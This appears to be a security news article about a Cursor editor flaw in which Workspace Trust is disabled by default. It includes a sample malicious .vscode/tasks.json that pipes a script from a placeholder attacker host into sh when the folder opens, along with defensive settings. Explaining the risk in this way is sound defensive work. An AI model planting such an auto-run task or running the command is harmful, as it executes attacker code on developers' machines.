A new security flaw has been found in the AI-powered code editor Cursor. The issue could let attackers run code silently on a user’s computer if they open a malicious repository.
The problem stems from a key security setting called Workspace Trust, which Cursor ships with disabled by default. As a result, tasks defined in a hidden file such as .vscode/tasks.json can run automatically the moment a developer opens a project. Simply browsing a malicious repository can therefore trigger code execution without any warning.
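To illustrate the mechanism, the sketch below shows what a malicious .vscode/tasks.json could look like. It relies on the documented runOptions.runOn: "folderOpen" feature, which asks the editor to start a task as soon as the folder is opened; the label and the attacker URL here are hypothetical placeholders, not taken from the actual report:

```jsonc
{
  "version": "2.0.0",
  "tasks": [
    {
      // Innocuous-looking label to avoid suspicion (hypothetical)
      "label": "build",
      "type": "shell",
      // Placeholder payload; a real attack could run any shell command
      "command": "curl -s https://attacker.example/payload.sh | sh",
      // Ask the editor to run this task automatically on folder open
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

With Workspace Trust enabled, an editor would normally refuse to run such tasks in an untrusted folder; with the feature off, nothing stands between opening the repository and executing the command.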
Cursor is based on Visual Studio Code, which includes Workspace Trust precisely to prevent such risks. But with the feature disabled in Cursor, attackers can use the editor as a vector for supply chain attacks. According to Oasis Security, the flaw could expose sensitive data, alter files, or even give attackers deeper access to a system.
Security experts recommend enabling Workspace Trust, opening unknown repositories in a separate editor first, and reviewing their files before loading them in Cursor.
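One way to apply the first recommendation is through the editor's user settings. The snippet below uses the standard VS Code setting names for Workspace Trust and automatic tasks; whether Cursor honors each of them is an assumption, since the article does not specify a configuration path:

```jsonc
{
  // Re-enable Workspace Trust so untrusted folders open in restricted mode
  // (VS Code setting names; assumed to carry over to Cursor)
  "security.workspace.trust.enabled": true,
  "security.workspace.trust.startupPrompt": "always",
  // Additionally block tasks marked runOn: "folderOpen" from starting on their own
  "task.allowAutomaticTasks": "off"
}
```

In VS Code these settings live in the user-level settings.json; restricted mode then disables task auto-run, debugging, and workspace-provided extensions until the user explicitly trusts the folder.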
The discovery highlights a growing concern: AI-powered coding tools are facing both new and old types of threats. Alongside prompt injection attacks, which trick AI into running unsafe commands, researchers are also finding traditional security flaws in these platforms.
Recent reports show vulnerabilities across several AI development tools, including SQL injection, path traversal, and authentication bypass issues. Some of these flaws could let attackers steal API keys, read sensitive files, or even execute commands remotely.
Experts warn that as AI-driven development grows, security must remain a top priority. Classic protections like sandboxing, authentication, and code review are still critical.